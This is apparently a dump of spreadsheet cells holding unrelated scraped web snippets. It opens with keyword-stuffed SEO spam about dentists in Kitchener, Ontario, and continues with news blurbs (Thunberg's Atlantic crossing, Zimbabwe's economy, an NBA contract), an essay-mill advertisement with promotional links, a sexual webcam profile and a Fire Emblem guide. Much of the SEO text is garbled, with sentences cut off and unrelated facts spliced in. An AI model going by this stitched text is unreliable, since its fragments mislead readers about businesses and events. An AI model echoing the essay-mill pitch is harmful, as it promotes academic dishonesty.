listing (2) opening hours (16) Categories. With porcelain veneers placed at a clinic such as Sunnylane Family Dentistry, patients can see their smile rejuvenated and. Silman’s Smiles Spas are dedicated to providing the best possible dental service to Northeastern New Jersey individuals and their families. They perform general dentistry services as well as. Bill and Eleanor Seavey run a small inn near Hearst Castle in California. Arizona, for some sun – and dental work. “Many. Highest Rated Dental Clinic In Kitchener Ontario Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full. Closing arguments. The pair is facing a. Pharmacists in Ontario Highest Rated Dentist In Kitchener Ontario Here is the definitive. Cosmetic Dental Clinic Near Kitchener Ontario King Street Dental Centre is a dental clinic in Waterloo &amp; Kitchener. Our Waterloo dentist provides cosmetic and general dentistry treatments to your oral health. Book an appointment today. Cosmetic Dental Clinic Near Kitchener Ontario At Sherwood Dental Care – Dentist in Kitchener we take great pleasure and satisfaction in providing complete family dental care in the Kitchener and Waterloo area for all patients. Best Dentist In Kitchener Ontario. They’re Ontario’s top-billing doctors, but for years their identities have been kept secret. Until now – He’s Ontario’s highest billing doctor. who operates out of OCC Eyecare, with its main clinic located in an industrial area. Friendliest Dentist Near Kitchener Ontario The dental implants and prosthetics market is anticipated to grow with a significant rate in the coming years, owing to facto. Trying to choose a family dentist in Guelph? Harvard Rd Dental Care makes the decision easy. We’re committed to providing. Also, outlet malls in Ontario. friendly environment, and that’s the best that can be done when retail vacancies become an. That Sudbury Sports Guy: Bringing out their best — Garrett Rank downs sibling Kyle to win Idylwylde Invitational – “I was doing my part to try and prevent a domestic dispute,” said Roberts with a laugh, the tournament regular travelling to Sudbury from his home in the Kitchener-Waterloo. playoff),” suggested. As you consider a dentist in Kitchener, ON, take some time to browse our website and familiarize yourself with our practice. Welcome to our General and Family Dentistry, located in Kitchener, Ontario. We offer a Emergency Dentistry, Pediatric Dentistry. Number 1 Dental Clinic Near Kitchener Ontario We're a dental practice serving the Kitchener-Waterloo area committed to providing a high quality dental experience for our patients, from children to grandparents. Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Find useful information, the address and the phone number of the local business you are looking for. Kid Friendly Dental Clinic In Kitchener Same Day Emergency Appointments Sometimes dental emergencies happen and you’ll need a dentist you know can help you as soon as possible. We have a Kitchener location and a Waterloo location that both offer emergency appointments. Call the clinic. Fall Creek Dentistry Offers Healthy Smiles At The Most Affordable Prices At Fishers, IN – Two of the most amazing offers that any dental clinic can give to. commitment not only to their family but to the entire. Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric clinic is equipped with child-friendly technology and dentistry tools. Our clinic is highly interactive, designed to give children a. Kid Friendly Dental Clinic Near Kitchener Ontario Most Popular Dentist Near Kitchener A Kitchener man quit his job to work full time on his YouTube channel. The gamble paid off – James Hobson just bought a house in Kitchener, near the Waterloo border. Then. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. Another way to get children to like visiting dentists is to give children special treats after visiting dental clinics. A. The prized residential setting means that many locals also value having access to the best dental services that can be obtained for their family. In her review, Tricia G. of Carlsbad stated that they. India- Fall Creek Dentistry Offers Healthy Smiles At The Most Affordable Prices At Fishers, IN – that is not available in other dental clinics. Fall Creek Dentistry is dedicated to providing excellent service and. Driven with their family-oriented philosophy, they treat every patient as part of their family which makes their dental clinic the perfect. Silman Smile Spa offers friendly and excellent. Kid Friendly Dentist Near Kitchener That is great, if you live near Ottawa Street in Kitchener and can enjoy. She lives on Margaret Avenue in Kitchener. To. Readers Choice: Kids – Unique toys, gifts and collectibles make this whimsical downtown spot and repeat SFR Best of Santa Fe winner a go-to for. Reviews on Kid Friendly Restaurants in Kitchener, ON – Fork and Cork Grill, J &amp; B Family Restaurant, Red House, The Bent Elbow, The Bauer Kitchen, The Adventurers' Guild Cafe, Moose Winooski's, Pupuseria Latinos, Country Boy Family Restaurant, 271. We offer friendly, expert dental care to families in Kitchener-Waterloo. From baby’s first tooth to the most complex needs, you can trust us to keep you smiling! From baby’s first tooth to the most complex needs, you can trust us to keep you smiling! Kid Friendly Dentist Near Kitchener Ontario The 35 to 55-year-olds wanted family-friendly events. in apartments near Centre in the Square and at Arrow Lofts beside th. Most Popular Dental Clinic Near Kitchener Ontario Lyon and Storey Coalition meets Thursday. Family dentist providing gentle dentistry services in Kitchener-Waterloo. Kid Friendly Dentist Kid Friendly Dentist Round Rock, TX As a kid friendly dentist in Round Rock we treat young children, including preschooler and elementary age children, for their first checkup. We realize that a lot of parents do not bring their child to the. Kid Friendly Dentist Kid Friendly Dentist Chester, VA As a kid friendly dentist in Chester we treat young children, including preschooler and elementary age children, for their first checkup. We realize that a lot of parents do not bring their child to the dentist until. You can’t miss this spot, located in a unique corner space on Arthur Street near the centre. of their family, whether. Fun Things to Do in Kitchener with Kids: Family-friendly activities and fun things to do. See TripAdvisor's 2,094 traveller reviews and photos of kid friendly Kitchener attractions Kitchener Kitchener Tourism Kitchener Hotels Kitchener Bed and Breakfast Flights to. Kids Dentist Kitchener, Ontario A pediatric dentist can offer comprehensive oral care specifically suited to the needs of your child. Just as you would take your child to a pediatrician to receive medical care, pediatric dentists undergo additional education and training to offer the highest standard of dental. Damm loved people, kids – This year’s family friendly event is set for May 16 at Olcott Park in Virginia. services with a variety of crisis needs and things they struggle to pay, such as dental procedures and anesthesia, Number 1 Dentist In Kitchener Pair facing drug. Cosmetic Dental Clinic Near Kitchener Ontario King Street Dental Centre is a dental clinic in Waterloo &amp; Kitchener. Our Waterloo dentist provides cosmetic and general dentistry treatments to your oral health. Book an appointment today. At our Kitchener clinic, we offer complete dental care services that will make sure that your teeth remain strong and in good condition. Find Cosmetic Dentistry near you Companies having. web (15) email (14) verified listing (2) opening hours (16) Categories. Kid Friendly Dentist In Kitchener Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. Shakespeare in Action’s first season of its annual outdoor summer production in the park. Opening act is local talent from northwest Toronto. Family-friendly play is 75 minutes of Shakespeare’s. Dentistry for Kids, Kid-Friendly Dentist | Colgate® Oral Care Is it a struggle to get children into the dentist's chair? Learn more about the rise in kid-friendly dentists and preparing children for their visit. Number 1 Dental Clinic Near Kitchener Ontario Kitchener Walk In Clinic The Laurentian Walk-In Clinic operates as a walk in clinic in Kitchener, Ontario. The clinic is located on Ottawa Street South at the Zehrs Superstore inside the Joe Fresh entrance. It is south of the Conestoga Parkway between the Fischer. Enquire for a fast quote. Free consultation. Choose from 14 Dentists in Waterloo, Ontario with 2 verified patient reviews find the best one for you. See popular locations and treatments. Patients of Violinist Nuala Freund didn’t let her scoliosis get in the way of seeing the world – She took to the instrument, and soon there was a family trio – with her mother, Kathleen, on piano and her father, Geoffrey. Looking for a dentist in Waterloo? Waterloo Smiles – best dental care clinic serving family, Cosmetic and Pediatric Dentistry in Waterloo-Kitchener, ON. Book an Appointment; call. Look no further if you are trying to find the best kids dentist in Kitchener. Smile Town has a team of experienced children's dental care experts. If you are searching for a dentist in Kitchener, we have assembled a team of dental professionals that are able to perform most dental procedures including that of periodontics, oral surgery, implant dentistry, and general dentistry. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. Preferred Dentist Near Kitchener Preferred Dental Clinic Near Kitchener Welcome to Kitchener East Family Dental, Your Preferred Dentist in Kitchener. Whether you need cosmetic dentistry, sedation dentistry, pediatric dentistry, or a top quality general dentist, we can meet your needs, Top Dental Clinic Near Kitchener Ontario Best Dentist In -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2019/01/09/top-dental-clinic-near-kitchener-ontario-7/ Fairway Dental Urgent Care Clinic Kitchener Dentists -&gt; Source . Friendliest Dentist Near Kitchener Ontario Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated investor schemes. We act as. More moon memories: Readers recall the lunar landing – Alas, instead of offering coverage of the space mission, the single channel available in the Saguenay Valley was showing a. Dental Implants in Kitchener, ON (Results 1 – 20 of 20) Switch to Map 43.4237401,-80.5527645 Dawson Dental Centre – Kitchener Dentist Ontario, 235 Ira Needles Blvd N2N 3K6 Kitchener (519) 742-2010 Open Opening Hours. Most Popular Dental Clinic In Kitchener Cosmetic Dental Clinic Near Kitchener Top Dentist Near Kitchener Best Dental Pick – How many times has the dental hygienist told you. It has hook scrapers on either end to help get between your teeth and. Dr. Vera Etches, the unit’s top doctor, said that in 2016 and 2017. Point Pelee National Park near Windsor was considered. Data collected will only. from: jobsdb.com – 2 days ago Similar: medical doctor hong kong, Top Dentist Near Kitchener Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. Here is the definitive list of Kitchener's top undefined as rated by the Kitchener, ON commun...</t>
  </si>
  <si>
    <t>Sports Buff</t>
  </si>
  <si>
    <t>2:04 PM ET Free-agent forward Furkan Korkmaz has agreed to a two-year contract to return to the Philadelphia 76ers, agent Mike Lindeman of Excel Sports tells ESPN. Korkmaz, 21, is a rotational forward with the ability to spread the floor with his shooting. The loss of JJ Redick in free agency — and Kyle Korver‘s decision to choose Milwaukee over Philadelphia — brought some increased urgency to keep Korkmaz on the Sixers roster. The deal includes a guarantee on the first year, league sources said. The Sixers had declined his option for the 2019-20 season to create salary-cap space, but brought him back as an unrestricted free agent. Korkmaz was the 26th overall pick in the 2016 NBA draft out of Turkey, where he enjoyed impressive professional and national team careers prior to the NBA. Korkmaz has played two seasons with the Sixers. He averaged nearly six</t>
  </si>
  <si>
    <t>10 Best Places to Visit in New Zealand The post 10 Best Places to Visit in New Zealand appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>The Downside Risk of Best Affordable Essay Writing Services The exact same editorial quality check procedure is included with the essay revision service process also. Our business is well-known https://writing-online.net/buyessay-co-uk-review for customer-friendly approach with regard to pricing. The cases once we can assist you, vary a good deal. Best Affordable Essay Writing Services Secrets Don’t hesitate to get in touch with us anytime you require college admission essay help. Therefore, if you can’t observe an essay type on which you will need college essays help in the USA, you’re able to directly call https://writing-online.net/essaywriter-co-uk-review our customer service team for additional support. Composing college essays doesn’t have to be daunting or frustrating in the event you learn some basic pursuits and adhere to all of cure heartburn and of them. Who Else Wants to Learn About Best Affordable Essay Writing Services? There are quite a lot of kinds of on-line writing. Various essay writing help grant some perks with no price, thus we are. At any time you require an essay writing help, get in touch with the service. If you are not pleased with any facet of your completed sample essay, you are able to request a complimentary revision. Among the examples could include the college essay writing services. It’s possible to get assistance with essay of any kind! You’re able to communicate directly with your dedicated, experienced writer to ensure your custom made paper or college essay fulfills your requirements. It’s possible for you to start writing the very first paragraph after the title. Therefore, utilizing a university essay writing service might be rather helpful. If you are in need of a well-written paper on short notification, the group of skilled essay writers at Grademiners is simply what you’re searching for. Our college writers have the capacity to analyze each topic when revealing any kind of an issue and deliver unsurpassed essays. Lastly, the writers from Ultius offer unmatched quality and originality when it has to do with the last sample essay you get. The 5-Minute Rule for Best Affordable Essay Writing Services Our highly-trained customer service agents, understand the students’ needs and are prepared to extend the essential assistance to set an order within the shortest time possible. Unfortunately, the vast majority of writing services online are a scam and just flaunt themselves across the web to bring in money. Choose your writing service today and request some academic assistance when you require it. Higher grades are just a few clicks away from you! Nonetheless, students from all over the planet, have already taken advantage of hiring professional and trustworthy online writing companies, like, for example, writing-an-essay. The Benefits of Best Affordable Essay Writing Services If you believe you might want to stay in contact with the writer, then we’ve got good news, since we only welcome your involvement in the practice. Great editing a part of excellent writing. Thus don’t worry, you are going to receive your assignment in time or even well beforehand. It’s a fact that some factors a pressing deadline, as an example can produce the paper more difficult to write. The matter of rambling without a clear-cut direction also has to be avoided in any paper you make it from a research proposal writing service. Though other essay writing websites charge you exorbitant rates, we supply you with cheap paper writing services of the peak quality. It is crucial to compose every document beforehand and get started writing admission essays months before the application procedure begins. Our clients aren’t required to cover papers they haven’t seen yet. Whatever paper you’ve assigned, there’s a professional service which will be able to help you craft it.</t>
  </si>
  <si>
    <t>Best Dentists in Airdrie, AB – Airdrie Dental Choice, Blunston Dental Group, Airdrie Springs Dental, North Main Family Dental, Sonata Dental, Bayside Dental &amp; Orthodontics, Sierra Springs Dental, Kingsview Dental, Nose Creek Dental Centre, Rahul. Best Dental Clinic Near Airdrie Alberta Airdrie, Alberta 141 Dentists near you Go StarOfService Alberta Airdrie Dentists Hire the best Dentists in Airdrie. Expressions Dental Airdrie Dentist T4A 0K9 Airdrie (Show more) (Show less) Show more. Best Dentists in Airdrie, AB – Airdrie Dental Choice, Blunston Bayside Airdrie Dental &amp; Orthodontics serves patients in Airdrie Alberta and the surrounding areas. Book your visit! New patients are welcome. (403. Kid Friendly Dental Clinic Near Airdrie Alberta Best Dental Clinic Near Airdrie Alberta Airdrie, Alberta 141 Dentists near you Go StarOfService Alberta Airdrie Dentists Hire the best Dentists in Airdrie. Expressions Dental Airdrie Dentist T4A 0K9 Airdrie (Show more) (Show less) Show more. Best Dentists in Airdrie, Blue Fern Denture Clinic. 93 likes · 18 talking about this · 1 was here. At Blue Fern Denture Clinic we offer complete and partial dentures, even. . I'm sure most people have heard about George Washington's dentures being made of wood, but that's not actually. Highest Rated Dentist In Airdrie Best Dental Clinic Near Airdrie Alberta Airdrie, Alberta 141 Dentists near you Go StarOfService Alberta Airdrie Dentists Hire the best Dentists in Airdrie. Expressions Dental Airdrie Dentist T4A 0K9 Airdrie (Show more) (Show less) Show more. Best Dentists in Airdrie, Airdrie Stonegate Health and Dental Clinic Launches New Teeth Whitening Service – a Dentist in Airdrie AB has decided it will offering free teeth whitening and free dental consultations for new patients, and this is expected to take place July 18. Where most Dentists tend to just. Enquire for a fast quote from Airdrie Dental Studio. Excellent ServiceScore : 4.1 from 6 votes. Airdrie in Alberta is the location of this dental clinic where pain free and stress free dentistry is performed by the expert team. All options are di. Major Players Operating in the Dental Braces Market from 2019 to 2023 | Technavio – Thus, the growing number of dentists is expected to increase the number of dental clinics, which, in turn. period,” says a. West Airdrie Dental – 5013-35 Mackenzie Way, Airdrie, Alberta T4B 0V7 – Rated 5 based on 23 Reviews "I have nothing but amazing things to say about each. Jump to Sections of this page Accessibility Help Press alt + / to open this menu Facebook Email or</t>
  </si>
  <si>
    <t>Number 1 Dental Clinic Near Halton Hills Ontario Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated investor schemes. We act as. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Cosmetic Dental Clinic Near Halton Hills Ontario 为您提供与 Oakville 相关的域名和网站信息，帮助您从域名应用的角度更好的了解域名是如何被使用的，为您使用域名提供参考依据。 Top Dentist In Halton Hills Top cities in United States Washington, D.C. The World’s 15 Best Places to Retire on $1 Million – We count down our top picks. private clinics to get medical care quickly and at a reasonable cost. Want more MoneyWise?. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, King's Cove Family Dental, Market Place Dental Centre, Young Dentistry, Oksana M. Sawiak, Preferred Dentist In Halton Hills Number 1 Dentist In Halton Hills Please provide a keyword, business name or phone number. Canada Business Directory Ontario Halton Hills Dentists in Halton Hills 692 results for Dentists in Halton Hills, ON Market Place Dental Centre (3.1 km) 280 Guelph St Georgetown, ON, L7G 4B1. Best Dentist in Halton Hills RSS Friendliest Dentist In Highest Rated Dental Clinic In Halton Hills Ontario 15 Side Rd, Halton Hills, Ontario, L7G 6E4, Canada (905) 877-0900 www.etobicokepediatricdentistry.com. Dental Implants Mar 7, 2019 Opening Hours Tue: 9 am – 4 pm Fri: 9 am – 4 pm Dentists Near Me Miller Family 221 Miller Dr Zelek Walter Z 1 Princess. Locate and compare Dentists in Halton Hills ON, Yellow Pages Local Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated investor schemes. We act as.</t>
  </si>
  <si>
    <t>"It's not me". The figurehead of the Xbox, Phil Spencer, is clearly in favor of collaboration with the competition rather than keeping it at bay, to such an extent that it would not want to take anything away from Sony or the PlayStation brand to improve the family of Microsoft consoles. In an interview with Fortune Magazine, when asked if the consumer's reaction to competition was affecting Microsoft's decisions, Spencer said, "I would say the most competitive aspect is the next: No. I always listen to the community, but the people who want to see others fail to make the green team succeed – it's not me.There were people, when l &amp; rsquo; "Sony's agreement was announced, I could see it online," what are you doing to help them? " Read the full article on pushsquare.com .</t>
  </si>
  <si>
    <t>The palace issued a written statement on the matter but we're still curious.</t>
  </si>
  <si>
    <t>Rachel Olding</t>
  </si>
  <si>
    <t>"The idea that a couple of Australians were going to show Americans how to drink in the Italian manner - well, let’s just say it sounded like a long shot," one bar writer said.</t>
  </si>
  <si>
    <t>Airport spokeswoman said 180 flights were canceled at the airport just outside Amsterdam, stranding passengers at Schiphol and other airports</t>
  </si>
  <si>
    <t>My Kinks: Heels, feet, stockings, nylons, role play, strip d Webcam profile: Hello men, i’m very funny and sexy girl. Come to hot pvt with me! Favourite sex position: Doggy What I do in my amateur show: I like honest and strong men! What I don’t like: I dont like liers. Gallery</t>
  </si>
  <si>
    <t>Police are searching for the “heartless” offenders who stole precious jewellery and hearing aids that belong to 14-year-old Bailey, who has a rare disease and is only expected to live a short life.</t>
  </si>
  <si>
    <t>Dominic Bossi</t>
  </si>
  <si>
    <t>Danny Vukovic was undergoing a simple jumping exercise when he sustained an injury that is likely to keep him out for the entire European season.</t>
  </si>
  <si>
    <t>An investigation by Special Counsel Robert Mueller found multiple contacts between Trump's campaign and Moscow, and several instances in which the president tried to impede Mueller's probe.</t>
  </si>
  <si>
    <t>Media playback is unsupported on your device Media captionThe Swedish teen behind the climate strikes Swedish climate activist Greta Thunberg has accepted a ride across the Atlantic by boat to attend two key climate conferences. The teenager will make the journey aboard the Malizia II, a high-speed 18-metre (60ft) yacht built to race around the globe. “We’ll be sailing across the Atlantic Ocean from the UK to New York in mid August,” she tweeted. Thunberg refuses to fly because of the environmental impact of air travel. In a Facebook post, Team Malizia said they were “honoured to sail Greta Thunberg emission free across the Atlantic”. She had previously said that she wanted to attend the UN Climate Action summit in New York on 23 September, but was struggling to work out how to make it without taking a plane or going on a cruise ship – which have similarly high emissions. Hurricanes also often deter sailors from trans-Atlantic journeys in August. Should I offset my summer holiday flights? Which airline is best for carbon emissions? “Taking a boat to North America is basically impossible,” she previously told the Associated Press news agency. Now, the 16-year-old will be able to attend the New York conference. She will later journey by low-carbon transport south to the annual Santiago Climate Change Conference in December. Malizia II was built to compete in the 2016-2017 round-the-world Vendée Globe race. The high-tech vessel generates electricity through solar panels and underwater turbines. Thunberg and her father will make the crossing with captain Boris Herrmann, Monaco royal family member Pierre Casiraghi and a Swedish documentary maker, Nathan Grossman. The journey is expected to take about two weeks. A spokeswoman for Team Malizia told the BBC they approached Thunberg to offer to take her, and had no previous plan to sail the yacht across the Atlantic. It is not known how the activist will return to Europe. She is staying in the Americas for nine months, so as yet Team Malizia has no plan to take her back to Europe. The team has not yet calculated the cost of the trip. Image copyright EPA/Handout Image caption Boris Herrmann, seen here captaining the Malizia II, will make the journey with Greta Thunberg Image copyright EPA/Handout Image caption Team Malizia founder Pierre Casiraghi (left), a member of Monaco’s royal family, will also make the journey Source link</t>
  </si>
  <si>
    <t>A festival that started covering bare CBD trees in knitted jumpers has helped to lift spirits during the drought.</t>
  </si>
  <si>
    <t>Kenji Fujimoto worked for North Korea's ruling family for more than a decade, but was feared missing after speaking about his time as Kim's childhood companion.</t>
  </si>
  <si>
    <t>[00:00:00]- Embrace [00:04:27]- Everywhere Elusive [00:11:11]- Ours To Keep [00:17:36]- I Love Your Soul [00:22:35]- Anew [00:25:53]- Aasha [00:30:02]- If [00:33:23]- Gone [00:37:38]- Stranded [00:42:25]- Saana [00:49:06]- Under The Lanterns [00:51:56]- Call of the Ancients [00:58:16]- Promises [01:02:23]- Last Ship From Childhood [01:07:11]- Reflections [01:11:57]- Arcane [01:15:50]- Forsaken [01:19:26]- Hollow Grounds [01:23:29]- The Moment The post CHILLOUT LOUNGE RELAXING MUSIC Summer Special Mega Mix 2019 #03 appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Brittney Matejka</t>
  </si>
  <si>
    <t>A person infected with hepatitis C can access free treatment in Saskatchewan through taking a daily dose of medication in as little as eight weeks.</t>
  </si>
  <si>
    <t>Though her son made a full recovery, Bell initially blamed herself for putting his life in danger, even during to anti-depressants for a time. See full article at Film-news.co.uk » The post Lake Bell felt guilty after son's 'traumatic' home birth appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Television news broadcasts on Tuesday evening in Hong Kong showed police with batons and shields trying to disperse hundreds of people.</t>
  </si>
  <si>
    <t>American companies remain keen on tapping business opportunities in China, despite trade tensions between the two countries.</t>
  </si>
  <si>
    <t>● Follow our Dubstep Playlist: http://ukf.io/DubstepPlaylist ● Download/Stream now: https://blacktigersexmachine.lnk.to/GoldRemix BTSM brings the darkness to Excision &amp; Illenium’s Gold 🦖😈 Black Tiger Sex Machine Like → https://www.facebook.com/official.btsm Follow → https://twitter.com/OfficialBTSM Listen → https://soundcloud.com/blacktigersexmachine Instagram → http://instagram.com/officialbtsm Visit → http://www.blacktigersexmachine.com Excision Like → https://www.facebook.com/Excision Follow → https://twitter.com/Excision Listen → https://soundcloud.com/excision Instagram → https://www.instagram.com/excisionofficial/ Visit → https://excision.ca/ […] The post Excision &amp; Illenium ft. Shallows – Gold (Black Tiger Sex Machine Remix) appeared first on Dubster.</t>
  </si>
  <si>
    <t>Thyholynoodles</t>
  </si>
  <si>
    <t>Hi everyone! This is my first post on OzBargain, so forgive me if the deal has been posted before, or I break a rule Been looking at the new bottlecap range from Seiko, which I think look pretty cool! Noticed today that the special edition SRPC68K (with the bronze bezel and root beer dial) is only $189 on Starbuy. Considering it is an automatic with 100m water resistance and a screw down crown, I think its a solid price (it was $299 a few days ago). Have ordered from Starbuy a couple of times in the past and have had no issues with them :)</t>
  </si>
  <si>
    <t>GoodLayers – Travel Tour – Installation Demo Data With Duplicator On GoDaddy The post GoodLayers – Travel Tour – Installation Demo Data With Duplicator On GoDaddy appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Harare, Zimbabwe – A year ago, with Zimbabwe‘s longtime ruler Robert Mugabe out of the picture, the troubled African country seemed to have taken a turn for the better. Mugabe’s successor and the incumbent, Emmerson Mnangagwa, was speaking a new language. Politically, he was breaking away from his predecessor’s ruinous and often autocratic past and presenting himself as a new man, re-engaging with the international community after years of diplomatic ostracisation. A return to democracy was expected. Economically, the 76 year old was pursuing new policies such as opening up the country for business under the “open for business” mantra. He was also looking to abandon controversial policies such as indigenisation – a law that compelled foreign investors with businesses with a net asset value of $1 to cede 51 percent equity stakes to indigenous Zimbabweans to right historical wealth imbalances. Aided by various public relations gimmicks that won him admiration, Mnangagwa was set to succeed. On one occasion, he stopped his presidential motorcade at a popular fast food outlet for a chicken meal. He is said to have waited in the queue like everyone else. Mnangagwa gives his inaugural speech to thousands of people after his win in last year’s disputed polls [Aaron Ufumeli/EPA] Fast forward a year, the hope for a new Zimbabwe has vanished. Mnangagwa has lost support and confirmed everyone’s worst fear: there is someone who can run the country worse than Mugabe. Innocent Zhakata, a book vendor on Harare’s streets, told Al Jazeera things have gotten tougher since Mnangagwa took over. “Life is getting tough. Prices are going up. There is no money in the economy. During Mugabe’s time, life was better. People are now realising they made a mistake [supporting the military coup that catapulted Mnangagwa to power],” Zhakata told Al Jazeera. “In the few months we have been with these guys, things have gotten worse. Things were better. We could buy property, furniture and other things. Now, we can’t even buy clothes.” Munyaradzi Mufambi, a 22-year-old beverage merchandiser in the capital, said the last year had been disillusioning for him. “I am not sure about the future of our generation in light of the problems we face as a country. I wonder if I will ever be able to raise a family and provide for them adequately,” said Mufambi. “In all fairness, I don’t know if the president has plans to fix the problems. Maybe he just hasn’t communicated these plans to the nation.” Mufambi, like Zhakata, said the standards of living were much better under Mugabe. “Given a choice between Mugabe and Mnangagwa, I would choose Mugabe,” said Mufambi. “School fees was $20 in my time. A quart of beer was $2. I have to forego beer now, save money and buy essential things. I now buy second-hand clothing.” Promises and ‘lies’ Ibbo Mandaza, a respected academic and director of a local think-tank Sapes Trust, said Mnangagwa’s first year as president had been a total failure. “Ever since that coup in November 2017, things have actually been getting worse. It’s been worse than we expected. We are now faced with a far worse political and economic crisis characterised by power shortages, rising prices, currency crisis and fuel shortages,” Mandaza told Al Jazeera. “What is more worrying is that whilst we are in this crisis, there is virtual absence of government intervention. One can be forgiven for thinking there is now government. At this rate, I don’t see this government getting to 2023. “Under Mugabe, things were getting bad. It’s the same group of people essentially. It’s them and it appears it ends with them. This can’t go on forever. I am concerned with the apparent lack of an alternative political solution in this crisis to step in and help end the crisis.” In the run-up to the elections last year, Mnangagwa promised millions of jobs, a better life, and a better Zimbabwe. The rise and fall of Zimbabwe’s Robert Mugabe A year later, none of the promises has been delivered. “He lied. We thought industries were going to open and new jobs created. He lied. None of the things he promised have been delivered,” Zhakata, who was laid off from one of the country’s largest bakery, Lobels, pointed out. Not many citizens will vent their anger in public. Some said Mnangagwa is far more brutal than Mugabe and an even worse dictator. In January, five months after being sworn in as the country’s third president, more than 17 unarmed people were shot and killed by the military for protesting against high fuel prices. Scores were wounded or arrested. Mugabe had generally been seen as a dictator, but he had never unleashed soldiers on protesters. Zimbabweans stand behind a burning barricade during protests against high fuel prices [Philimon Bulawayo/Reuters] The US imposed sanctions as a result, saying they would only be removed if Harare showed commitment and political will to return to democracy through fostering the rule of law and holding credible elections, among other key reforms. Just this week, Defence and War Veterans deputy minister Victor Matemadanda told a Zimbabwe National Liberation War Collaborators conference in Gweru the army would crush any protests. “The law says police must use minimum force when dealing with riotous people during demonstrations,” he said. “I do not know the level of the said minimum force. But if they fail to handle the demonstrations, the constitution says they must invite the military,” Matemadanda added. Opposition MDC National Youth Assembly spokesperson Steven Chuma said Mnangagwa’s short reign has been a disaster. “It’s crystal clear that Mnangagwa has failed. Never in the history of Africa has any president failed in one year as he has failed.” Clampdown on dissent Mnangagwa’s pledge to break with his predecessor’s past autocratic policies and tactics, and introduce far-reaching reforms in the realms of business and safeguarding fundamental rights, has so far been a pipe dream for many Zimbabweans. Zimbabwe experiences worst power outages in three years Since the beginning of the year, there has been a clampdown on activists and opposition figures. In the past few months, the government has seemingly targeted civil society activists and workers. State security agents arrested seven activists between May 20 and 27 at Harare’s Robert Gabriel Mugabe International Airport on their return from a workshop in the Maldives. Job Sikhala, deputy chair for the main opposition Movement for Democratic Change (MDC), was arrested last month on charges of attempting to subvert Mnangagwa’s government. The basis of Sikhala’s arrest was a video that circulated on social media in which he appears to be telling supporters at a rally: “We are going to take the fight to the doorsteps of Emmerson Mnangagwa. We are going to overthrow him before 2023 – that is not a joke.” What political reforms? Mnangagwa has also not instituted reforms to laws seen to be unconstitutional such as the repressive Access to Information and Protection of Privacy Act and the Public Order and Security Act. The two laws were seen as an attack on fundamental rights such as freedom of expression and association. Analysts say apart from his heavy-handedness and autocratic tactics, his short rule is one fraught with numerous failures. The economy is on its knees. Inflation is ravaging. General hardships are the order of the day. Power shortages have hit industry hard. Currency confidence is at its lowest. A spokesman for the ruling Zimbabwe African National Union – Patriotic Front (ZANU-PF), Simon Khaya Moyo, said Mnangagwa fared pretty fairly given the myriad of challenges he faced, such as the drought and the impact it was having on the economy. Moyo added that the government had instituted fiscal reforms that are bearing fruit as evidenced by the fiscal discipline within all government departments as well as the budget surplus. He added that the drought affected power generation in the country. “The water level at Kariba dam is at 24 percent of required capacity. This has affected power generation. That is not something we have control over. But we are working to resolve this issue,” said Moyo. “It’s been difficult for the people because of inflation. We want our people to have a good life as enunciated in our election manifesto. All the people of Zimbabwe should be well taken care of without bias and favour. It’s every citizen’s right. That is what we want for our people.” Source link</t>
  </si>
  <si>
    <t>AVATAR director James Cameron has congratulated Avengers Endgame for dethroning his film as the highest-grossing of all time. Daily Express :: Films Feed</t>
  </si>
  <si>
    <t>Colombia’s Egan Bernal becomes the youngest rider in 110 years to win the Tour de France, with his British team-mate Geraint Thomas taking second. The post Tour de France 2019: Egan Bernal wins, Geraint Thomas second, Peter Sagan wins in Paris appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Anthony Urciuoli</t>
  </si>
  <si>
    <t>The City of Hamilton is under an extended heat warning beginning Monday.</t>
  </si>
  <si>
    <t>Relationships are an important part of battles and downtime in Fire Emblem, and Three Houses has many people you can know – and many of them are. fictionalized characters that you can get involved at a deeper level. Fire Emblem: Three houses It takes a lot more time to interfere in the idle time between the missions than for the previous entries of the series. It therefore means more time for love to flourish with romantic character options for the male and female versions of the protagonist, Byleth. In Fire Emblem's past games, Romance was almost always the final game of any character relationship, or "support," that could reach the S rating level. Friendships ended in an A or A +, while romance led to rank S. In Three Houses, this is a little different: there are many rank S relationships, but not all of them are romantic; some are platonic. On this page we have listed all rank S relationships for Byleth men and women, noting platonic ones and those with fictionalized characters. The exact list varies a bit between the two versions of the protagonist, but the good news is that there are same-sex novels on both sides. Do not forget that you increase your support rank by making the most of your time at the monastery, as shown in our guide to the Fire Emblem: Three Houses. You have a lot of chances to increase your support rank: take characters for tea, give 